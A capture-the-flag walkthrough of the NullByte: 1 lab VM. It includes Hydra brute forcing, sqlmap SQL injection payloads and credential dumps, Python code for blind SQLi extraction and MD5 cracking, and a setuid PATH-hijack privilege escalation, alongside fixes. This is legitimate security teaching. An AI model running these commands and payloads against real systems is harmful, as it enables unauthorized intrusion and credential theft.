“Use your lateral thinking skills, maybe you’ll need to write some code.” – ly0n
For more information and the OVA file download, check the VulnHub page for NullByte: 1.
Attacker & Target
Attacker: Kali Linux (on the 10.1.1.0/24 lab network)
Target: NullByte: 1 (10.1.1.134, as found by the scans below)
Vulnerability & Exploit
Hidden information in the index-page picture reveals a hidden path
Weak password on the hidden web login form, recoverable by online brute force
SQL injection in the username search page
Exploiting the SQL injection yields database credentials and, through sqlmap, a limited shell
User ramses has a Base64-encoded MD5 password hash that cracks easily, allowing SSH login as ramses
Misconfigured setuid-root program that calls ps via system() without an absolute path; PATH hijacking gives ROOT
Method
Scanned the network to discover the target server [netdiscover]
Port scanned the target to discover open ports and running services [unicornscan & nmap]
Scanned the web application for known vulnerabilities [nikto]
Brute-forced hidden paths [dirb]
Web information gathering and interaction with the web server [Iceweasel/Firefox]
Downloaded the picture from index.html and revealed the hidden information stored in it
Found the hidden folder and a login page whose source comment says the password is simple
Brute-forced the login password with rockyou.txt [THC Hydra]
The username search page behind the login is SQL injectable; exploited it to read sensitive system files and login credentials, and to get a limited shell [sqlmap]
Cracked user ramses's password and logged in over SSH for a proper shell
System enumeration, then exploited a vulnerable setuid program to get ROOT
Tools
All the tools used here can be found in Kali Linux
As a routine first step, netdiscover finds the target's IP address (10.1.1.134 in this case).
F4l13n@kali:~$ sudo netdiscover -r 10.1.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:08 01 060 VMWare, Inc.
10.1.1.2 00:50:56:fd:d1:6b 01 060 VMWare, Inc.
10.1.1.134 00:0c:29:e1:e0:98 01 060 VMware, Inc.
10.1.1.254 00:50:56:ee:31:18 01 060 VMWare, Inc.
10.1.1.134 is our target!
Then run unicornscan to find the open ports on the target. unicornscan is much faster than nmap for a full 65535-port sweep, so I use it for the sweep and then let nmap do a deep scan on the ports it reports.
F4l13n@kali:~$ sudo us -H -msf -Iv -p 1-65535 10.1.1.134
listener statistics 147984 packets recieved 0 packets droped and 0 interface drops
TCP open http[ 80] from 10.1.1.134 ttl 64
TCP open sunrpc[ 111] from 10.1.1.134 ttl 64
TCP open multiling-http[ 777] from 10.1.1.134 ttl 64
TCP open unknown[32942] from 10.1.1.134 ttl 64
From the result above, TCP ports 80, 111, 777 and 32942 are open.
Then I ran an nmap scan to probe the four open ports in more detail.
# Nmap 6.49BETA4 scan initiated Mon Aug 17 07:06:13 2015 as: nmap -v -sV -O -A -T4 -p 80,111,777,32942 -oN NullByte_nmap.txt 10.1.1.134
Nmap scan report for 10.1.1.134
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 32942/tcp status
|_ 100024 1 47213/udp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
32942/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E1:E0:98 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.029 days (since Mon Aug 17 06:25:06 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 10.1.1.134
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 17 07:06:29 2015 -- 1 IP address (1 host up) scanned in 16.18 seconds
Port 777 is running SSH (OpenSSH 6.7p1) and Apache 2.4.10 is on port 80; the server is Debian Linux with a 3.x kernel.
Then I ran nikto to check whether any known web vulnerability turns up, which would be a life saver.
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.134
+ Target Hostname: 10.1.1.134
+ Target Port: 80
+ Start Time: 2015-08-17 07:01:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xc4 0x51c42a5c32a70
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7668 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2015-08-17 07:02:17 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nothing too exciting, but phpMyAdmin is installed at /phpmyadmin/.
Secret in the Pic
I tried the default and some common weak passwords against phpMyAdmin, but none worked.
Then I opened Iceweasel to take a closer look at the website. There is only a picture with the sentence "If you search for the laws of harmony, you will find knowledge."
Nothing wrong with the sentence, but the hint is hidden in the picture.
Looking at the printable strings in the downloaded GIF, pay attention to the second line below the GIF89a signature:
P-): kzMb5nVYJw
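To show where that text actually lives: a GIF can carry free text in a Comment Extension block (introducer byte 0x21, label 0xFE, followed by length-prefixed sub-blocks of at most 255 bytes), and that is what tools such as strings or exiftool surface. The following Python is an added example, not part of the original walkthrough: it walks the GIF block structure and returns every comment. The sample GIF it parses is constructed inside the code (with the hint string from this page written into it, plus a second comment long enough to span two sub-blocks) so that it runs without the real image.

```python
import struct


def _read_sub_blocks(data, pos):
    """Read GIF data sub-blocks (length byte + payload, ...) up to the 0x00 terminator."""
    chunks = []
    while True:
        if pos >= len(data):
            raise ValueError("truncated GIF: sub-block runs past end of file")
        n = data[pos]
        pos += 1
        if n == 0:
            return b"".join(chunks), pos
        chunks.append(data[pos:pos + n])
        pos += n


def _color_table_size(packed):
    """Bytes occupied by a colour table whose presence and size are encoded in a packed byte."""
    if packed & 0x80:
        return 3 * (2 ** ((packed & 0x07) + 1))
    return 0


def extract_gif_comments(data):
    """Return every Comment Extension (0x21 0xFE) payload in a GIF, decoded as latin-1."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    # Logical Screen Descriptor: width(2) height(2) packed(1) bg index(1) aspect(1)
    pos = 13 + _color_table_size(data[10])
    comments = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                       # Trailer
            break
        if block == 0x21:                       # Extension Introducer
            label = data[pos]
            pos += 1
            payload, pos = _read_sub_blocks(data, pos)
            if label == 0xFE:                   # Comment Extension
                comments.append(payload.decode("latin-1"))
        elif block == 0x2C:                     # Image Descriptor
            pos += 9 + _color_table_size(data[pos + 8])
            pos += 1                            # LZW minimum code size
            _, pos = _read_sub_blocks(data, pos)   # compressed image data
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    return comments


def _comment_ext(text):
    """Build a Comment Extension, splitting the text into <=255-byte sub-blocks."""
    raw = text.encode("latin-1")
    out = bytearray(b"\x21\xFE")
    for i in range(0, len(raw), 255):
        chunk = raw[i:i + 255]
        out += bytes([len(chunk)]) + chunk
    out += b"\x00"
    return bytes(out)


# Constructed 1x1 GIF (not the image from the box) carrying the hint found on the page
# and a second comment that is long enough to need two sub-blocks.
SAMPLE_GIF = (
    b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x00, 0, 0)       # no global colour table
    + _comment_ext("P-): kzMb5nVYJw")
    + b"\x21\xF9\x04\x00\x00\x00\x00\x00"                      # Graphic Control Extension
    + b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0x00)        # Image Descriptor, no local table
    + b"\x02" + b"\x02\x44\x01" + b"\x00"                      # LZW min code size + image data
    + _comment_ext("A" * 300)
    + b"\x3B"
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_GIF
    for comment in extract_gif_comments(data):
        print(repr(comment))
```

Run it with the path of the downloaded GIF as the only argument to list its comments; with no argument it parses the constructed sample. Comments are reassembled across sub-blocks, which matters because a comment longer than 255 bytes looks like several fragments in a plain strings dump.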
Trying the string kzMb5nVYJw as a hidden folder (http://10.1.1.134/kzMb5nVYJw/) turns up a hidden login page.
The page source says the form is not connected to MySQL and that the password is not complex, so an online dictionary attack against the form is the way to go.
I used Hydra with the rockyou.txt dictionary against the form and got the password: elite. The http-post-form module takes "path:POST body:failure string": the body has only a key field (^PASS^ is replaced with each candidate) and the response text invalid marks a failed attempt. The form has no username field, so -l admin is just a dummy value to satisfy Hydra's mandatory login parameter.
F4l13n@kali:~/vulnhub/NullByte$ sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.1.1.134 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid"
[sudo] password for F4l13n:
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-17 09:20:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 10.1.1.134 login: admin password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-17 09:20:57
After logging in with password elite, I was forwarded to the following username search page.
After trying several common SQLi tests, I found that the usrtosearch parameter is injectable; the injection point is http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=admin
kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --dbs
... ...
[09:45:30] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 151 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=-8162" OR 3808=3808#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=123" AND (SELECT * FROM (SELECT(SLEEP(5)))hjFz)#
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=123" UNION ALL SELECT NULL,NULL,CONCAT(0x7170706271,0x6845736a5777725a736a,0x71706b7a71)#
---
[09:45:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[09:45:32] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
[09:45:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'
[*] shutting down at 09:45:33
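sqlmap's output above names three techniques (boolean-based blind, time-based blind and UNION) against a query that quotes usrtosearch with double quotes and is closed off with a MySQL # comment. The following Python is an added example, not the box's PHP and not sqlmap's code: it rebuilds the seth.users table in an in-memory SQLite database, shows the string-built query shape that is assumed to sit behind 420search.php next to a parameterised fix, and implements the UNION dump and a boolean-based blind extraction by hand so the mechanics of the blind technique are visible. Because SQLite is the stand-in, payloads use single quotes and `-- ` where MySQL on the box took `"` and `#`, and unicode(substr()) where MySQL has ASCII(SUBSTRING()).

```python
import sqlite3

# Constructed stand-in for the seth.users table dumped on the page.
ROWS = [
    (1, "ramses", "", "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"),
    (2, "isis", "employee", "--not allowed--"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, position TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return conn


def search_vulnerable(conn, usrtosearch):
    """ASSUMED query shape behind 420search.php: user input pasted into the SQL text.
    The real page uses double quotes (hence sqlmap's -8162" OR 3808=3808# payload);
    SQLite wants single quotes, so the payloads below differ only in quote and comment."""
    sql = f"SELECT id, user, position FROM users WHERE user LIKE '%{usrtosearch}%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, usrtosearch):
    """Parameterised version: the input can only ever be a LIKE pattern, never SQL."""
    return conn.execute(
        "SELECT id, user, position FROM users WHERE user LIKE ?", (f"%{usrtosearch}%",)
    ).fetchall()


def union_dump(conn, search=search_vulnerable):
    """UNION-based: ride the three visible columns to pull the hidden pass column."""
    return search(conn, "x' UNION ALL SELECT NULL, user, pass FROM users-- ")


def boolean_oracle(conn, condition):
    """Boolean-based blind: the search returns rows iff the injected condition is true
    (no row contains an 'x', so the LIKE part alone matches nothing)."""
    return bool(search_vulnerable(conn, f"x' OR ({condition})-- "))


def blind_extract(conn, subquery, max_len=64):
    """Recover a scalar one character at a time with a binary search over the oracle:
    seven true/false requests per character instead of one per candidate byte.
    MySQL equivalent of the probes: LENGTH((...)) and ASCII(SUBSTRING((...), i, 1))."""
    out = ""
    for i in range(1, max_len + 1):
        if not boolean_oracle(conn, f"length(({subquery})) >= {i}"):
            break                                   # ran off the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if boolean_oracle(conn, f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("union dump:", union_dump(db))
    print("same payload against the fixed query:", union_dump(db, search_fixed))
    print("blind:", blind_extract(db, "SELECT pass FROM users WHERE user='ramses'"))
```

The blind routine is what sqlmap does under the hood when only a true/false difference is available; the UNION path is far cheaper (one request) whenever the column count matches, which is why sqlmap prefers it once it has found it. Against the parameterised query both payloads become a harmless pattern that matches nothing.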
Checking the databases to grab passwords:
kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --batch --smart --dump -C User,Password,Host,Super_priv -T user -D mysql
... ...
Database: mysql
Table: user
[6 entries]
+------------------+-------------------------------------------------------+-----------+------------+
| User | Password | Host | Super_priv |
+------------------+-------------------------------------------------------+-----------+------------+
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | localhost | Y |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | nullbyte | Y |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | 127.0.0.1 | Y |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | ::1 | Y |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC | localhost | Y |
| phpmyadmin | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | localhost | N |
+------------------+-------------------------------------------------------+-----------+------------+
[09:56:13] [WARNING] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/10.1.1.134/dump/mysql/user-f3649c95.csv'
[09:56:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'
[*] shutting down at 09:56:13
This gives the MySQL root login, which sqlmap cracked in passing and which also works for phpMyAdmin: root / sunnyvale
Be ramses!
The seth database also has a users table, which holds the password hash of user ramses:
kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --batch --smart --dump -T users -D seth
... ...
[10:12:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[10:12:15] [INFO] fetching columns 'position, user, id, pass' for table 'users' in database 'seth'
[10:12:15] [INFO] fetching entries of column(s) '`position`, `user`, id, pass' for table 'users' in database 'seth'
[10:12:15] [INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+--------+------------+---------------------------------------------+
| id | user | position | pass |
+----+--------+------------+---------------------------------------------+
| 1 | ramses | <blank> | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |
| 2 | isis | employee | --not allowed-- |
+----+--------+------------+---------------------------------------------+
[10:12:15] [INFO] table 'seth.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.134/dump/seth/users.csv'
[10:12:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'
[*] shutting down at 10:12:15
Found user credentials: ramses / YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
The stored value is Base64 encoding, not encryption: decoding it (the padding = was stripped) gives a 32-character hex string, i.e. an MD5 hash: c6d6bd7ebf806f43c76acc3681703b81
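The decode-and-crack step, as an added example that is not from the original post: it repairs the missing Base64 padding, decodes, classifies the result by digest length, and runs a dictionary attack with a tiny constructed wordlist standing in for rockyou.txt.

```python
import base64
import binascii
import hashlib
import re

STORED = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"   # ramses, from the seth.users dump

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "sunnyvale", "elite", "omega", "ramses"]


def decode_stored(value):
    """Base64-decode with the padding repaired; None if it is not valid Base64 text."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def guess_hash_type(s):
    """Cheap classification of an unsalted hex digest by its length."""
    if s and re.fullmatch(r"[0-9a-f]+", s):
        return {32: "MD5", 40: "SHA-1", 64: "SHA-256"}.get(len(s), "unknown hex")
    return None


def crack_md5(digest, words):
    """Dictionary attack: hash each candidate and compare against the target digest."""
    target = digest.lower()
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def recover_password(stored, words=WORDLIST):
    """Full chain: Base64 -> MD5 hex -> dictionary crack. None if any step fails."""
    digest = decode_stored(stored)
    if guess_hash_type(digest) != "MD5":
        return None
    return crack_md5(digest, words)


if __name__ == "__main__":
    print(decode_stored(STORED), "->", recover_password(STORED))
```

Unsalted MD5 of a dictionary word falls to the first wordlist pass; with rockyou.txt the same loop is what hashcat or john would do in a fraction of a second.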
Cracking that hash gives the password omega. From the earlier scan I know SSH listens on port 777, so I try to log in as ramses / omega and bingo!
F4l13n@kali:~/vulnhub/NullByte/sqlmap_rst$ ssh ramses@10.1.1.134 -p 777
ramses@10.1.1.134's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ pwd
/home/ramses
ramses@NullByte:~$
Now I am ramses!
Privilege Escalation
Looking around, I found an interesting setuid-root program, procwatch, in /var/www/backup.
Running the program and looking at its output, it clearly invokes the ps command through system(). It does not use the full path to ps, so the binary is resolved through the caller's $PATH: a classic misconfiguration that lets an attacker drop a fake ps, put its directory at the front of $PATH, and have it executed as ROOT.
So I wrote a shell script, saved it as ps, made it executable, and pointed $PATH at its directory before running procwatch:
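The lookup that makes this work, as an added example that is not the walkthrough's own script: a stand-in for procwatch's system("ps") call (subprocess with shell=True runs /bin/sh -c "ps", which is exactly what system() does), a planted ps that only prints a marker, and the PATH change that makes the victim pick it up. Nothing here is setuid, so it demonstrates the resolution, not the privilege gain; on the box the same resolution happens with euid 0.

```python
import os
import stat
import subprocess
import tempfile

# Constructed stand-in for the script dropped as 'ps'. On the box it would typically
# run id and then spawn a shell; here it only prints a marker so the hijack is testable.
FAKE_PS = "#!/bin/sh\necho HIJACKED\n"


def victim(command="ps", env=None):
    """Stand-in for procwatch: system("ps") becomes /bin/sh -c "ps", and the shell
    resolves a bare name through whatever PATH it inherited from the caller."""
    result = subprocess.run(command, shell=True, env=env, capture_output=True, text=True)
    lines = result.stdout.strip().splitlines()
    return lines[0] if lines else ""


def plant_fake_ps(directory):
    """Write the fake ps into an attacker-controlled directory and make it executable."""
    path = os.path.join(directory, "ps")
    with open(path, "w") as fh:
        fh.write(FAKE_PS)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def hijack(command="ps"):
    """Prepend the attacker directory to PATH and run the victim with that environment.
    Equivalent to: export PATH=/tmp/x:$PATH; ./procwatch"""
    with tempfile.TemporaryDirectory() as directory:
        plant_fake_ps(directory)
        env = dict(os.environ)
        env["PATH"] = directory + os.pathsep + env.get("PATH", "/usr/bin:/bin")
        return victim(command, env)


if __name__ == "__main__":
    print("bare 'ps'      ->", hijack("ps"))        # fake ps wins the PATH search
    print("absolute path  ->", hijack("/bin/ps"))   # PATH is never consulted
```

Two caveats a practitioner will hit on the real box. First, the id output above shows uid=1002 with euid=0: a setuid binary only raises the effective uid, and bash resets euid to the real uid on start unless run with -p, while dash (Debian's /bin/sh) keeps it; to turn that into a full root shell, call setuid(0) first (for instance from a small C or Python wrapper run by the fake ps). Second, the fix is on the program side: call /bin/ps by absolute path or reset PATH to a fixed value before system(), and better still avoid system() in setuid code entirely, since it also inherits IFS and other shell-sensitive environment variables.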
ramses@NullByte:/var/www/backup$ ./procwatch
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 1170 Aug 2 01:45 proof.txt
Catch the flag proof.txt.
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

... ...
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----